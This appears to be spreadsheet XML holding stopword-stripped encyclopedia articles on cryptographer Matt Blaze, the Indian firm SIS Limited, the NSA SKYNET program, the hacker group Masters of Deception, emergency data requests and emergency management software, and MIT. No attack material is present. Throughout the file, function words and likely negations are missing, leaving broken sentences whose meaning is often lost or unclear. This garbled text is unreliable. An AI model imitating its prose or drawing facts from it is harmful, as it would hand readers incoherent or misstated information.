    <t>matt blaze american researcher focuses areas secure systems, cryptography, trust management. currently mcdevitt chair computer science georgetown university, board directors project. work blaze received computer science princeton university. 1992, working at&amp;t, blaze implemented strong cryptographic package known "cfs", cryptographic file system, unix, since ported linux. uses network file system transport mechanism, allowing users encrypt selected directory hierarchies, mount unencrypted providing key. november, 1993, presented paper project, cryptographic file system unix", conference computer communications security. blaze also published paper "key management encrypting file system", proceedings usenix summer 1994 technical conference. early 1990s, height "crypto war", blaze participant cypherpunks mailing list 1994, found critical weakness wiretapping mechanisms clipper chip. paper, protocol failure escrowed encryption standard, pointed clipper's escrow system serious vulnerability: brute-force attack could allow clipper chip used encryption device, disabling escrow capability. later time, authors seminal paper calculating secure lengths.after leaving bell, blaze associate professor computer information science university pennsylvania 2004 2018. blaze states quit long-term harassment university's locksmith angry master safecracking publications. joined faculty georgetown university, joint appointment georgetown department computer science. 2015, blaze part team proponents included steven bellovin, alex halderman, nadia heninger, andrea matwyshyn successfully proposed security research exemption section 1201 digital millennium copyright act.in july 2016, complete board project resigned announced board, including matt blaze.in 2018, crypto visa card company monaco paid blaze undisclosed amount rights domain crypto.com. blaze registered domain 1993 sellers estimated value domain us$5-10 million. education ph.d., computer science, january 1993. princeton university. (dissertation: caching large-scale distributed file systems) m.a., computer science, june 1989. princeton university m.s., computer science, 1988. columbia university b.s., january 1986. city university york (hunter college) publications ioannidis, john; blaze, matt. architecture implementation network-layer security under unix, proc. usenix security symp., pages 29–39, santa clara, october 1993. bellovin, steven blaze, matt; landau, susan; pell, stephanie it's complicated: internet upends katz, smith, electronic surveillance law, harvard journal technology vol. 30.1, pages 1–101. february 2017. bellovin, steven blaze, matt; landau, susan; owsley, brian seeking source: criminal defendants’ constitutional right source code ohio state technology journal vol. 17.1, pages 1-73. december 2020. also crypto naming controversy references external links official website</t>
  </si>
  <si>
    <t>SIS Limited</t>
  </si>
  <si>
    <t>group enterprise (formerly security intelligence services (india)) private security firm india, australia zealand. 1985 ravindra kishore sinha indian billionaire businessman journalist. rituraj sinha group managing director. group largest manpower security firms indo-pacific region sales excess ₹8,500 crore (fy2020).the company offers security, cash logistics, facility management services india, australia, asia-pacific regions. currently, ravindra kishore sinha chairman rituraj kishore sinha group managing director ltd. history origins group enterprise, formerly known security intelligence services (sis india), patna, bihar, 1978 sinha. inception company sinha occurred career trainee reporter ended 1973. security intelligence services india ltd. company small garage patna years old. 1985 1990 foundation year, 1986, india launched graduate trainee officer (gto) program initiated build cadre security officers managers. company also employed workforce 250-300 people turnover lakh.in 1989, india developed dos-based software program payroll management computers. 1991 2006 1991, india completed milestone crossing employee count beyond 1000.in 1998, india obtained certification, becoming first indian security company acquire it.in 2002, rituraj kishore sinha, alumnus leeds university business school, joined family business, sis. part larger professional management team, initial focus business process reengineering geographical expansion crore company point well regarded brand industry.in 2004, india developed launched first integrated end-to-end platform 2006 2021 2007, india commenced west india operations inauguration regional office mumbai. year, company also received approximately crores investment shaw, hedge funds firm.in 2008, acquired australia's largest security company, chubb security, becoming first indian multinational security services. acquisition australian guarding mobile patrol business unit industrial conglomerate united technologies handled citigroup behalf. 2010, india launched electronic security name tech sis.in 2011, india formed joint venture prosegur called prosegur providing cash services.on august 2011, announced entering joint venture terminix, perform pest termite control india. venture incorporated pest control segment facilities management segment called terminixsis. 2013, india received ₹550 crores investment partners, private equity firm, affirming history's largest investment security sector. 2014, india celebrated 40th anniversary, consolidated revenue crossing 2500 crore. company also acquires cash business rebrands sisco.in 2016, india made 4000 crore revenue, besides acquiring dusters, becoming india's largest facility management provider.in 2017, group launched, making company first nation become listed.in 2018, india consolidated leadership position india security acquiring stakes slv, bengaluru-based uniq detective security services rare hospitality services pvt. ltd.in 2019, india crossed workforce 200,000 billion revenues. company also consolidated apac leadership security acquiring henderson&amp; platform group.in 2021, group’s q3fy22 record quarter company highest ever revenue 2,601 crore said rituraj sinha. india felicitated best mega employers india. also, recognized “great place work” gptw institute india. rituraj sinha credited employees achievement said would strive achieve heights. since 2022 2022, crossed 10,000 crore annual revenue mark first time. reported consolidated revenue fy22 10,059 crore. fy22, entered rs10,000-crore revenue club clocking rs10,059.1 crore, growth 10.2 percent last fiscal. what interesting security services, facility management cash logistics major took five years double revenue. rituraj sinha, however, uses long-term lens make sense data. “from rs25 crore 2002 rs10,000 crore 2022. that’s story,” says. quickly qualifies statement. “it’s profitable sustainable story,” operations activities/services company offers security services banks, hotels, institutions, ites, residential colonies, retail commercial establishments. also offers electronic security systems, consulting, housekeeping security services like pre-employment verification surveillance, cash services include transfer cash valuables replenishment recruitment training services. india overseas company 10,000 customers include major industry players tata steel, tata motors, icici bank, idea cellular future group. over last decade, company diversified domestic play opted aggressive inorganic route expand overseas. operating structure group enterprise segments business structure three areas: security services includes services security design, fire safety, event security, protection, aviation security, emergency response, investigation work, integrated man-tech. cash logistics services offered prosegur, partnership spain’s prosegur security company, provide cash-in-transit, doorstep banking, atm-related services, precious cargo, bullion management, cash vaulting services. facility management services includes soft facility management hard facility management operations management. covid vaccinations group, completed inoculating 102,008 employees 2,30,000 workforce. this done humare heroes vaccination drive (hhvd) launched 2021, within record timeframe days. “while effort arranging vaccines employees, availability feasibility helped team turn reality,” said rituraj sinha, managing group director, ltd. people group enterprise following board directors: references</t>
  </si>
  <si>
    <t>SKYNET (surveillance program)</t>
  </si>
  <si>
    <t>skynet program u.s. national security agency performs machine learning analysis communications data extract information possible terror suspects. tool used identify targets, al-qaeda couriers, move cellular networks. specifically, mobile usage patterns swapping cards within phones esn, meid imei number deemed indicative covert activities. like many security programs, skynet program uses graphs consist nodes edges visually represent social networks. tool also uses classification techniques like random forest analysis. because data includes large proportion true negatives small training set, risk overfitting. bruce schneier argues false positive rate 0.008% would commercial applications google makes mistake, people want buy" government makes mistake, kill innocents." participation partnerships directorates participating: signals intelligence: s21, s22, research: technology: t12, t14it partnerships tmac/fastscope, lincoln labs harvard. controversy skynet project linked drone systems, thus creating potential false-positives lead deaths.according nsa, skynet project able accurately reconstruct crucial information suspects including social relationships, habits, patterns movements graph-based visualization data. however, scholars criticize current security literature conflate statistical discrepancies behavioral abnormalities anomaly detection methodology skynet perpetuates self/other binary. example, al-jazeera's bureau chief islamabad, ahmad zaidan, wrongly identified probable member al-qaeda muslim brotherhood records. also global surveillance references</t>
  </si>
  <si>
    <t>Masters of Deception</t>
  </si>
  <si>
    <t>masters deception (mod) york–based group hackers, widely known media exploits telephone company infrastructure later prosecution. origin masters deception mod's initial membership grew meetings loop-around test lines legendary collaborations hack rboc phone switches various minicomputers mainframes used administer telephone network. they successfully remained underground using alternative handles hide even true hacker identities. acid phreak founded masters deception scorpion hac. name was, among things, mockery legion doom (lod), letter alphabet 'l', although name originally flexible acronym could used identify membership situations anonymity would best course action. could stand "millions dollars" easily "masters deception." claimed mockery name statement underground lost direction. several members close friends raided indicted government, causing majority remained drop underground safety reasons. absence, largely fell disarray causing disagreement disillusionment phiber optik align effort restore direction spirit underground hacking. members original masters deception included: mark abene ("phiber optik"), paul stira ("scorpion"), elias ladopoulos ("acid phreak"), hac, john ("corrupt") julio fernandez ("outlaw"). additional members remained anonymous include: supernigger (also dpak), wing, nynex phreak, billy_the_kid, crazy eddie, plague, zod, seeker, knight (who also member cult dead cow), lord micro, n00gie peaboy (a.k.a. sprinter). philosophy masters deception operated differently many respects previous hacking groups. although openly shared information other, took controversial view sharing information outside group. believed access mod's knowledge earned degrees initiation proven respect craft, rather releasing powerful information wild could used nefarious purposes. demonstration responsibility part initiate required. this informal compartmentalized protection sensitive knowledge structure originally employed 1980s, rather successfully. according luthor, realized early certain people trusted certain information, certain types information trusted one. giving useful things irresponsible people would inevitably lead whatever thing abused longer useful. possessive information frequently withheld things articles." fall result major nationwide investigation joint fbi/secret service task force, five mod's members indicted 1992 federal court. case prosecuted u.s. attorney's office southern district york assistant u.s. attorneys stephen fishbein geoffrey berman. within next months 1993), five pleaded guilty sentenced either probation prison. after sentencing abene, 2600: hacker quarterly, winter 1993-94, cover doll labeled "berman" stabbed dagger. popular culture singer/songwriter referenced phrase "mod there?" 1995 song "hello". references further reading village voice, july 1990. cover article julian dibbel. "notorious m.o.d." wired. 9.06. retrieved 2012-06-15. "gang cyberspace". wired. 2.12. retrieved 2012-06-15. "small scale sin, three". this american life. november 1995. retrieved 2012-06-15. profiles ladopoulos release prison. @large strangest case world's biggest internet invasion (isbn 0-684-83558-4) michele slatalla; joshua quittner january 1996). masters deception: gang that ruled cyberspace. harpercollins. isbn 978-0-06-092694-6. retrieved june 2012. book mod, vol. computer underground digest, volume issue</t>
  </si>
  <si>
    <t>Emergency Data Request</t>
  </si>
  <si>
    <t>emergency data request procedure used u.s. enforcement agencies obtaining information service providers emergency situations time subpoena. 2022, brian krebs reported emergency data requests spoofed hackers obtain confidential information.there proposals secure emergency data requests using digital signatures, would require substantial technical legal effort implement. references</t>
  </si>
  <si>
    <t>Emergency management information system</t>
  </si>
  <si>
    <t>emergency management information system (emis) computer database disaster response provides graphical, real-time information responders. emis emergencies four phases emergency readiness, risk mitigation, response, replay. emis shall enable emergency managers emergency stakeholder (affected civilians, police, fireman, government organizations (ngo), etc.) make required activities phase emergency easy speedy way. emis readiness preparation contingency plans different types emergencies creating checklists easily reached related emergency management stakeholder resource management emis risk mitigation determine possible risk areas and/or risk types. often supported geographical information system (gis). emis response executing tracking contingency plan emis replay review events emergency various kind reports (supported tables, graphs, etc.)an emis interacts many early alert systems communicates many legacy systems. also emergency management emergency management software emergency communication system logistics support system wireless emergency alerts references</t>
  </si>
  <si>
    <t>Emergency management software</t>
  </si>
  <si>
    <t>emergency management software software used local, state federal emergency management personnel deal wide range disasters (including natural human-made hazards) take many forms. example, training software simulators often used help prepare first responders, word processors keep form templates handy printing analytical software used perform post-hoc examinations data captured incident. systems interrelated, results after-incident analysis used program training software better prepare similar situation future. crisis information management software (cims) software found emergency management operation centers (eoc) supports management crisis information corresponding response public safety agencies. history although software existed prior 9/11, 2001 significant increase focus emergency management. 2001 study national institute justice (nij) compared software features vendors. 2004, institute security technology studies published report addressing interoperability different software, remained strong focus development software emergency management field. support national incident management system implementation, department homeland security established national incident management system support center (nims supporting technology evaluation program (step) 2005. 2007 study similar national institute justice report conducted united states force (usaf). 2008 united states force university colorado center homeland security surveyed several hundred emergency management personnel seeking prioritize user requirements. characteristics common features software include geographic information systems (gis), weather plume modeling, resource management, command, control, communication (c3) functions. federal emergency management agency (fema) supports evaluation software national incident management system supporting technology evaluation program (nims step). october 2013 fema p-tac center (formally nimssc) longer taking applications step. national preparedness directorate incident management systems integration division (npd-imsi) identifies criteria program evaluate against. these criteria derived primarily national incident management system. example: emergency support functions (esfs) national response framework (nrf) definition incident command functions national incident management system resource management (preparedness, incident response, post-incident recovery, reimbursement) all-hazards philosophy national incident management system specific hazards identified national fire protection association (nfpa) 1600: standard disaster emergency management business continuity programs standardized framework common operating picture national incident management system scalability national incident management system command management incident command system (ics) national incident management systemfema currently uses webeoc emergency management software. florida based healthcare system adventhealth uses facilities healthcare compliance software. interoperability primary focus standards interoperability. lack interoperability identified drawback (although limited scope software) national institute justice feature comparison report conducted 2001. 2004, federal emergency management agency created national incident management system addresses interoperability providing standardized definitions different software utilize. national incident management system prescribes several required features systems must incorporate. american national standards institute international committee information technology standards (ansi incits) 398-2005: information technology common biometric exchange formats framework (cbeff) institute electrical electronics engineers (ieee) 1512-2006: standard common incident management message sets emergency management centers national fire protection association (nfpa) 1221: standard installation, maintenance, emergency services communications systems organization advancement structured information standards (oasis) common alerting protocol (cap) v1.1 organization advancement structured information standards (oasis) emergency data exchange language (edxl) distribution element v1.0 crisis emergency modeling simulation software simulation mainly used preparedness phase emergency management process. simulation performed analyze possible emergency scenarios, evaluate recovery strategies train institutional private operators better facing crisis. simulations deal weather climate forecasting, landslides, clouds propagation, earthquake impact, cyber attacks, people behavior, critical infrastructures. precondition simulation modeling. furthermore, increasing interest simulating socio-technical systems impact emergency (e.g., natural disaster) considered infrastructures population. purpose, novel approach adopt domain-specific modeling techniques order support representation crisis scenario executable model. also emergency management emergency communication system emergency management information system (emis) edxl sharp references</t>
  </si>
  <si>
    <t>Emergency notification app</t>
  </si>
  <si>
    <t>emergency notification software application designed broadcast emergency notifications multiple groups contacts various delivery methods. built mobile devices smartphones tablet computers. emergency notification part wider emergency notification system provided alternative system. emergency service response emergency services response designed take emergency incidents public safety answering points e-mail, fax, direct communication means transmit information first responders. this includes direct app, text message, even e-mail. allows responders respond system responding incident allowing incident response management information exchanged amongst system. additional features platform include mapping, pre-planing, resource references among responders. first market systems included responding app". responding. introduced text messaging public safety form "spotteddog rover". spotteddog rover. introduced formal mapping/ pre-plans. also emergency alert system emergency communication system emergency notification system wireless emergency alerts references "red cross emergency notification app". cross. "fema emergency notification app". fema.</t>
  </si>
  <si>
    <t>Massachusetts Institute of Technology</t>
  </si>
  <si>
    <t>massachusetts institute technology (mit) private land-grant research university cambridge, massachusetts. established 1861, since played role development modern technology science, ranking among academic institutions world.founded response increasing industrialization united states, adopted european polytechnic university model stressed laboratory instruction applied science engineering. institute urban campus extends mile (1.6 alongside charles river, encompasses number major off-campus facilities lincoln laboratory, bates center, haystack observatory, well affiliated laboratories broad whitehead institutes. december 2021, nobel laureates, turing award winners, fields medalists affiliated alumni, faculty members, researchers. addition, national medal science recipients, national medals technology innovation recipients, macarthur fellows, marshall scholars, astronauts, chief scientists u.s. force, numerous heads states affiliated mit. institute also strong entrepreneurial culture alumni founded co-founded many notable companies. member association american universities (aau) received sloan research fellowships university north america. history foundation vision 1859, proposal submitted massachusetts general court newly filled lands back bay, boston "conservatory science", proposal failed. charter incorporation massachusetts institute technology, proposed william barton rogers, signed john albion andrew, governor massachusetts, april 1861.rogers, graduate william mary professor uva, wanted establish institution address rapid scientific technological advances. wish found professional school, combination elements professional liberal education, proposing that: true practicable object polytechnic school conceive, teaching, minute details manipulations arts, done workshop, inculcation scientific principles form basis explanation them, along this, full methodical review leading processes operations connection physical laws. rogers plan reflected german research university model, emphasizing independent faculty engaged research, well instruction oriented around seminars laboratories. early developments days chartered, first battle civil broke out. after long delay years, mit's first classes held mercantile building boston 1865. institute founded part morrill land-grant colleges fund institutions promote liberal practical education industrial classes" land-grant school. 1863 act, commonwealth massachusetts founded massachusetts agricultural college, developed university massachusetts amherst. 1866, proceeds land sales went toward buildings back bay.mit informally called "boston tech". institute adopted european polytechnic university model emphasized laboratory instruction early date. despite chronic financial problems, institute growth last decades 19th century president francis amasa walker. programs electrical, chemical, marine, sanitary engineering introduced, buildings built, size student body increased thousand.the curriculum drifted vocational emphasis, less focus theoretical science. fledgling school still suffered chronic financial shortages diverted attention leadership. during "boston tech" years, faculty alumni rebuffed harvard university president (and former faculty) charles eliot's repeated attempts merge harvard college's lawrence scientific school. there would least attempts absorb harvard. cramped back location, could afford expand overcrowded facilities, driving desperate search campus funding. eventually, corporation approved formal agreement merge harvard, vehement objections faculty, students, alumni. however, 1917 decision massachusetts supreme judicial court effectively merger scheme. 1916, administration charter crossed charles river ceremonial barge bucentaur built occasion, signify mit's move spacious campus largely consisting filled land mi-long (1.6 tract along cambridge side charles river. neoclassical "new technology" campus designed william bosworth funded largely anonymous donations mysterious "mr. smith", starting 1912. january 1920, donor revealed industrialist george eastman rochester, york, invented methods film production processing, founded eastman kodak. between 1912 1920, eastman donated million ($236.6 million 2015 dollars) cash kodak stock mit. curricular reforms 1930s, president karl taylor compton vice-president (effectively provost) vannevar bush emphasized importance pure sciences like physics chemistry reduced vocational practice required shops drafting studios. compton reforms "renewed confidence ability institute develop leadership science well engineering". unlike league schools, catered middle-class families, depended tuition endowments grants funding. school elected association american universities 1934.still, late 1949, lewis committee lamented report state education "the institute widely conceived basically vocational school", "partly unjustified" perception committee sought change. report comprehensively reviewed undergraduate curriculum, recommended offering broader education, warned letting engineering government-sponsored research detract sciences humanities. school humanities, arts, social sciences sloan school management formed 1950 compete powerful schools science engineering. previously marginalized faculties areas economics, management, political science, linguistics emerged cohesive assertive departments attracting respected professors launching competitive graduate programs. school humanities, arts, social sciences continued develop successive terms humanistically oriented presidents howard johnson jerome wiesner 1966 1980. defense research mit's involvement military science surged world 1941, vannevar bush appointed head federal office scientific research development directed funding select group universities, including mit. engineers scientists across country gathered mit's radiation laboratory, established 1940 assist british military developing microwave radar. work done significantly affected subsequent research area. other defense projects included gyroscope-based complex control systems gunsight, bombsight, inertial navigation charles stark draper's instrumentation laboratory; development digital computer flight simulations project whirlwind; high-speed high-altitude photography harold edgerton. war, became nation's largest wartime contractor (attracting criticism bush), employing nearly 4000 radiation laboratory alone receiving excess $100 million ($1.2 billion 2015 dollars) 1946. work defense projects continued even then. post-war government-sponsored research included sage guidance systems ballistic missiles project apollo. these activities affected profoundly. 1949 report noted lack "any great slackening pace life institute" match return peacetime, remembering "academic tranquility prewar years", though acknowledging significant contributions military research increased emphasis graduate education rapid growth personnel facilities. faculty doubled graduate student body quintupled terms karl taylor compton, president 1930 1948; james rhyne killian, president 1948 1957; julius adams stratton, chancellor 1952 1957, whose institution-building strategies shaped expanding university. 1950s, longer simply benefited industries worked three decades, developed closer working relationships patrons, philanthropic foundations federal government.in late 1960s early 1970s, student faculty activists protested vietnam mit's defense research. period mit's various departments researching helicopters, smart bombs counterinsurgency techniques vietnam well guidance systems nuclear missiles. union concerned scientists founded march 1969 meeting faculty members students seeking shift emphasis military research toward environmental social problems. ultimately divested instrumentation laboratory moved classified research off-campus lincoln laboratory facility 1973 response protests. student body, faculty, administration remained comparatively unpolarized tumultuous time many universities. johnson seen highly successful leading institution "greater strength unity" times turmoil. however students sentenced prison terms time former student leaders, michael albert george katsiaficas, still indignant mit's role military research suppression protests. (richard leacock's film, november actions, records tumultuous events.) 1980s, controversy involvement (space weaponry) (chemical biological warfare) research. more recently, mit's research military included work robots, drones 'battle suits'. recent history kept pace helped advance digital age. addition developing predecessors modern computing networking technologies, students, staff, faculty members project mac, artificial intelligence laboratory, tech model railroad club wrote earliest interactive computer video games like spacewar! created much modern hacker slang culture. several major computer-related organizations originated since 1980s: richard stallman's project subsequent free software foundation founded mid-1980s lab; media founded 1985 nicholas negroponte jerome wiesner promote research novel uses computer technology; world wide consortium standards organization founded laboratory computer science 1994 berners-lee; opencourseware project made course materials 2,000 classes available online free charge since 2002; laptop child initiative expand computer education connectivity children worldwide launched 2005.mit named sea-grant college 1976 support programs oceanography marine sciences named space-grant college 1989 support aeronautics astronautics programs. despite diminishing government financial support past quarter century, launched several successful development campaigns significantly expand campus: dormitories athletics buildings west campus; tang center management education; several buildings northeast corner campus supporting research biology, brain cognitive sciences, genomics, biotechnology, cancer research; number "backlot" buildings vassar street including stata center. construction campus 2000s included expansions media lab, sloan school's eastern campus, graduate residences northwest. 2006, president hockfield launched energy research council investigate interdisciplinary challenges posed increasing global energy consumption.in 2001, inspired open source open access movements, launched opencourseware make lecture notes, problem sets, syllabi, exams, lectures great majority courses available online charge, though without formal accreditation coursework completed. while cost supporting hosting project high, expanded 2005 include universities part opencourseware consortium, currently includes academic institutions content available least languages. 2011, announced would offer formal certification (but credits degrees) online participants completing coursework "mitx" program, modest fee. "edx" online platform supporting mitx initially developed partnership harvard analogous "harvardx" initiative. courseware platform open source, universities already joined added course content. march 2009 faculty adopted open-access policy make scholarship publicly accessible online.mit police force. three days boston marathon bombing april 2013, police patrol officer sean collier fatally shot suspects dzhokhar tamerlan tsarnaev, setting violent manhunt shut campus much boston metropolitan area day. week later, collier's memorial service attended 10,000 people, ceremony hosted community thousands police officers england region canada. november 2013, announced creation collier medal, awarded annually individual group embodies character qualities officer collier exhibited member community aspects life". announcement stated "future recipients award include whose contributions exceed boundaries profession, contributed building bridges across community, consistently selflessly perform acts kindness".in september 2017, school announced creation artificial intelligence research called mit-ibm watson lab. spend $240 million next decade, staffed scientists. october 2018 announced would open schwarzman college computing dedicated study artificial intelligence, named lead donor blackstone group stephen schwarzman. focus college study interdisciplinary education, used fields diverse history biology. cost buildings faculty college expected billion upon completion.the laser interferometer gravitational-wave observatory (ligo) designed constructed team scientists california institute technology, mit, industrial contractors, funded national science foundation. designed open field gravitational-wave astronomy detection gravitational waves predicted general relativity. gravitational waves detected first time ligo detector 2015. contributions ligo detector observation gravitational waves, caltech physicists, thorne barry barish, physicist rainer weiss nobel prize physics 2017. weiss, also graduate, designed laser interferometric technique, served essential blueprint ligo.in 2021, researchers field computer science artificial intelligence developed system makes robots better handling objects. simulated, anthropomorphic hand created could manipulate 2,000 objects, system needing know holding order successfully manipulate campus mit's 166-acre (67.2 campus city cambridge spans approximately mile along north side charles river basin. campus divided roughly half massachusetts avenue, dormitories student life facilities west academic buildings east. bridge closest harvard bridge, known marked non-standard unit length smoot.the kendall/mit mbta line station located northeastern edge campus, kendall square. cambridge neighborhoods surrounding mixture high tech companies occupying modern office rehabilitated industrial buildings, well socio-economically diverse residential neighborhoods. early 2016, presented updated kendall square initiative city cambridge, plans mixed-use educational, retail, residential, startup incubator, office space dense high-rise transit-oriented development plan. museum eventually moved immediately adjacent kendall square subway entrance, joining list visual arts center eastern campus.each building number (possibly preceded designation, name well. typically, academic office buildings referred primarily number residence halls referred name. organization building numbers roughly corresponds order buildings built location relative (north, west, east) original center cluster maclaurin buildings. many buildings connected ground well extensive network tunnels, providing protection cambridge weather well venue roof tunnel hacking.mit's on-campus nuclear reactor powerful university-based nuclear reactors united states. prominence reactor's containment building densely populated area controversial, maintains well-secured. 1999 bill gates donated us$20 million construction computer laboratory named "william gates building", designed architect frank gehry. while microsoft previously given financial support institution, first personal donation received gates.mit nano, also known building interdisciplinary facility nanoscale research. 100,000 (9,300 cleanroom research space, visible expansive glass facades, largest research facility kind nation. with cost us$400 million, also costliest buildings campus. facility also provides state-of-the-art nanoimaging capabilities vibration damped imaging metrology suites sitting atop 5×10^6 (2,300,000 slab concrete underground.other notable campus facilities include pressurized wind tunnel testing aerodynamic research, towing tank testing ship ocean structure designs, previously alcator c-mod, largest fusion device operated university. mit's campus-wide wireless network completed fall 2005 consists nearly 3,000 access points covering 9.4×10^6 (870,000 campus.in 2001, environmental protection agency sued violating clean water clean regard hazardous waste storage disposal procedures. settled suit paying $155,000 fine launching three environmental projects. connection capital campaigns expand campus, institute also extensively renovated existing buildings improve energy efficiency. also taken steps reduce environmental impact running alternative fuel campus shuttles, subsidizing public transportation passes, building low-emission cogeneration plant serves campus electricity, heating, cooling requirements.mit substantial commercial real estate holdings cambridge pays property taxes, plus additional voluntary payment lieu taxes (pilot) academic buildings legally tax-exempt. 2017, largest taxpayer city, contributing approximately city's annual revenues. holdings include technology square, parts kendall square, many properties cambridgeport area neighboring educational buildings. land held investment purposes potential long-term expansion. architecture mit's school architecture, school architecture planning, first formal architecture program united states, history commissioning progressive buildings. first buildings constructed cambridge campus, completed 1916, sometimes called "maclaurin buildings" institute president richard maclaurin oversaw construction. designed william welles bosworth, imposing buildings built reinforced concrete, first non-industrial much less university building bosworth's design influenced city beautiful movement early 1900s features pantheon-esque great dome housing barker engineering library. great dome overlooks killian court, graduation ceremonies held year. friezes limestone-clad buildings around killian court engraved names important scientists philosophers. spacious building atrium massachusetts avenue regarded entrance infinite corridor rest campus.alvar aalto's baker house (1947), eero saarinen's chapel kresge auditorium (1955), i.m. pei's green, dreyfus, landau, wiesner buildings represent high forms post-war modernist architecture. more recent buildings like frank gehry's stata center (2004), steven holl's simmons hall (2002), charles correa's building (2005), fumihiko maki's media extension (2009) stand among boston area's classical architecture serve examples contemporary campus "starchitecture". these buildings always well received; 2010, princeton review included list twenty schools whose campuses "tiny, unsightly, both". housing undergraduates guaranteed four-year housing mit's undergraduate dormitories. dormitories, currently active residential halls, burton conner, undergoing renovation 2020 2022. those living campus receive support mentoring live-in graduate student tutors, resident advisors, faculty housemasters. because housing assignments made based preferences students themselves, diverse social atmospheres sustained different living groups; example, according yale daily news staff's insider's guide colleges, 2010, "the split east campus west campus significant characteristic mit. east campus gained reputation thriving counterculture." also dormitories single graduate students apartment buildings campus married student families.mit active greek co-op housing system, including thirty-six fraternities, sororities, independent living groups (fsilgs). 2015, undergraduates lived mit-affiliated housing; participated fraternities women involved sororities. most fsilgs located across river back near founded, also cluster fraternities mit's west campus face charles river basin. after 1997 alcohol-related death scott krueger, pledge gamma delta fraternity, required freshmen live dormitory system starting 2002. because fsilgs previously housed many freshmen off-campus, policy could implemented simmons hall opened year.in 2013–2014, abruptly closed demolished undergrad dorm bexley hall, citing extensive water damage made repairs infeasible. 2017, shut senior house century service undergrad dorm. that year, administrators released data showing senior house residents graduated four years. campus-wide, four-year graduation rate (the cumulative graduation rate significantly higher). organization administration chartered non-profit organization owned governed privately appointed board trustees known corporation. current board consists members elected five-year terms, life members vote 75th birthday, elected officers (president, treasurer, secretary), officio members (the president alumni association, governor massachusetts, massachusetts secretary education, chief justice massachusetts supreme judicial court). board chaired diane greene ’78, co-founder former vmware former google cloud. corporation approves budget, programs, degrees faculty appointments, elects president serve chief executive officer university preside institute's faculty. mit's endowment financial assets managed subsidiary called investment management company (mitimco). valued $16.4 billion 2018, mit's endowment sixth-largest among american colleges universities.mit five schools (science, engineering, architecture planning, management, humanities, arts, social sciences) college (schwarzman college computing), schools medicine. while faculty committees assert substantial control many areas mit's curriculum, research, student life, administrative affairs, chair mit's academic departments reports dean department's school, turn reports provost president. current president rafael reif, formerly served provost president susan hockfield, first woman hold post. academics large, highly residential, research university majority enrollments graduate professional programs. university accredited england association schools colleges since 1929. operates 4–1–4 academic calendar fall semester beginning labor ending mid-december, 4-week "independent activities period" month january, spring semester commencing early february ceasing late may.mit students refer majors classes using numbers acronyms alone. departments corresponding majors numbered approximate order foundation; example, civil environmental engineering course linguistics philosophy course students majoring electrical engineering computer science (eecs), popular department, collectively identify "course students combination department's course number number assigned class identify subjects; instance, introductory calculus-based classical mechanics course simply "8.01" mit. undergraduate program four-year, full-time undergraduate program maintains balance professional majors arts sciences, dubbed "most selective" u.s. news, admitting transfer students 4.1% applicants 2020–2021 admissions cycle. offers undergraduate degrees across five schools. 2017–2018 academic year, 1,045 bachelor science degrees (abbreviated "sb") granted, type undergraduate degree awards. 2011 fall term, among students designated major, school engineering popular division, enrolling students degree programs, followed school science (29%), school humanities, arts, social sciences (3.7%), sloan school management (3.3%), school architecture planning (2%). largest undergraduate degree programs electrical engineering computer science (course 6–2), computer science engineering (course 6–3), mechanical engineering (course physics (course mathematics (course 18). undergraduates required complete core curriculum called general institute requirements (girs). science requirement, generally completed freshman year prerequisites classes science engineering majors, comprises semesters physics, semesters calculus, semester chemistry, semester biology. there laboratory requirement, usually satisfied appropriate class course major. humanities, arts, social sciences (hass) requirement consists eight semesters classes humanities, arts, social sciences, including least semester division well courses required designated concentration hass division. under communication requirement, hass classes, plus classes taken designated major must "communication-intensive", including "substantial instruction practice oral presentation". finally, students required complete swimming test; non-varsity athletes must also take four quarters physical education classes.most classes rely combination lectures, recitations associate professors graduate students, weekly problem sets ("p-sets"), periodic quizzes tests. while pace difficulty coursework compared "drinking fire hose", freshmen retention rate similar research universities. "pass/no-record" grading system relieves pressure first-year undergraduates. class taken fall term, freshmen transcripts either report class passed, otherwise record spring term, passing grades appear transcript non-passing grades recorded. (grading previously "pass/no record" freshman year, amended class 2006 prevent students gaming system completing required major classes freshman year.) also, freshmen choose join alternative learning communities, experimental study group, concourse, terrascope.in 1969, margaret macvicar founded undergraduate research opportunities program (urop) enable undergraduates collaborate directly faculty members researchers. students join initiate research projects ("urops") academic credit, pay, volunteer basis postings urop website contacting faculty members directly. substantial majority undergraduates participate. students often become published, file patent applications, and/or launch start-up companies based upon experience urops.in 1970, then-dean institute relations, benson snyder, published hidden curriculum, arguing education often slighted favor following unwritten expectations graduating good grades often product figuring system rather solid education. successful student, according snyder, able discern formal requirements ignored favor unstated norms. example, organized student groups compiled "course bibles"—collections problem-set examination questions answers later students references. this sort gamesmanship, snyder argued, hindered development creative intellect contributed student discontent unrest. graduate program mit's graduate program high coexistence undergraduate program, many courses taken qualified students levels. offers comprehensive doctoral program degrees humanities, social sciences, stem fields well professional degrees, including master business administration (mba). institute offers graduate programs leading academic degrees master science (which abbreviated mit), various engineer's degrees, doctor philosophy (phd), doctor science (scd) interdisciplinary graduate programs md-phd (with harvard medical school) joint program oceanography woods hole oceanographic institution.admission graduate programs decentralized; applicants apply directly department degree program. more doctoral students supported fellowships, research assistantships (ras), teaching assistantships (tas). bootcamps bootcamps intense week-long innovation leadership programs challenge participants develop venture week. each bootcamp centers around particular topic, specific industry, leadership skill set, emerging technology. cohorts organized small teams work entrepreneurial project together, addition individual learning team coaching. program includes series online seminars faculty, practitioners, industry experts, innovation workshops bootcamp instructors focused putting theory participants learned practice, coaching sessions, informal office hours learners exchange ideas freely. bootcampers tasked weekly "deliverables," elements business plan, help guide group decision-making process involved building enterprise. experience culminates final pitch session, judged panel experts.mit bootcamp instructors include eric hippel, sanjay sarma, erdin beshimov, bill aulet. bootcamps founded erdin beshimov. rankings also places among five many overall rankings universities (see right) rankings based students' revealed preferences. several years, u.s. news world report, world university rankings, academic ranking world universities ranked mit's school engineering first, 1995 national research council report. lists, mit's strongest showings apart engineering computer science, natural sciences, business, architecture, economics, linguistics, mathematics, and, lesser extent, political science philosophy.times higher education recognized world's "six super brands" world reputation rankings, along berkeley, cambridge, harvard, oxford stanford. 2019, ranked among universities around world scimago institutions rankings. 2017, times higher education world university rankings rated university arts humanities. ranked 2015 2017 nature index annual tables, measure largest contributors papers published leading journals. georgetown university researchers ranked u.s. 20-year return investment. collaborations university historically pioneered research training collaborations academia, industry government. 1946, president compton, harvard business school professor georges doriot, massachusetts investor trust chairman merrill grisswold founded american research development corporation, first american venture-capital firm. 1948, compton established industrial liaison program. throughout late 1980s early 1990s, american politicians business leaders accused universities contributing declining economy transferring 